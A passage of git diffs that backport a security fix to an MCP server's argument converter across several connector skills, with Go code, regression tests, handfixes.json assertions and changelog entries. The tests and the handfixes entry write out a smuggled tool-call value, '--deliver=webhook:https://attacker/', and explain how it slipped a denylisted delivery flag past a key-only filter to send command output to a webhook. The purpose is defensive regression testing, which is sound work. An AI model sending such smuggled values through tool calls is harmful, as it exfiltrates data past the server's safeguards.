-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/crowdstrike/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/crowdstrike/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/crowdstrike/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/crowdstrike/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/crowdstrike/handfixes.json
+++ b/skills/crowdstrike/handfixes.json
@@ -333,8 +333,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -344,7 +356,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/crowdstrike/handfixes.json
+++ b/skills/crowdstrike/handfixes.json
@@ -318,6 +318,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/datto-bcdr/CHANGELOG.md
+++ b/skills/datto-bcdr/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.5]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.4] - 2026-08-26
 
 ### Fixed

--- a/skills/datto-bcdr/CHANGELOG.md
+++ b/skills/datto-bcdr/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-08-26
 

--- a/skills/datto-bcdr/CHANGELOG.md
+++ b/skills/datto-bcdr/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-08-26

--- a/skills/datto-bcdr/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/datto-bcdr/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/datto-bcdr/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/datto-bcdr/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/datto-bcdr/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/datto-bcdr/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/datto-bcdr/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/datto-bcdr/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/datto-bcdr/handfixes.json
+++ b/skills/datto-bcdr/handfixes.json
@@ -156,8 +156,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -167,7 +179,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/datto-bcdr/handfixes.json
+++ b/skills/datto-bcdr/handfixes.json
@@ -141,6 +141,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/datto-rmm/CHANGELOG.md
+++ b/skills/datto-rmm/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.5]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.4] - 2026-08-26
 
 ### Fixed

--- a/skills/datto-rmm/CHANGELOG.md
+++ b/skills/datto-rmm/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-08-26
 

--- a/skills/datto-rmm/CHANGELOG.md
+++ b/skills/datto-rmm/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.4] - 2026-08-26

--- a/skills/datto-rmm/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/datto-rmm/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/datto-rmm/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/datto-rmm/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/datto-rmm/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/datto-rmm/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/datto-rmm/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/datto-rmm/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
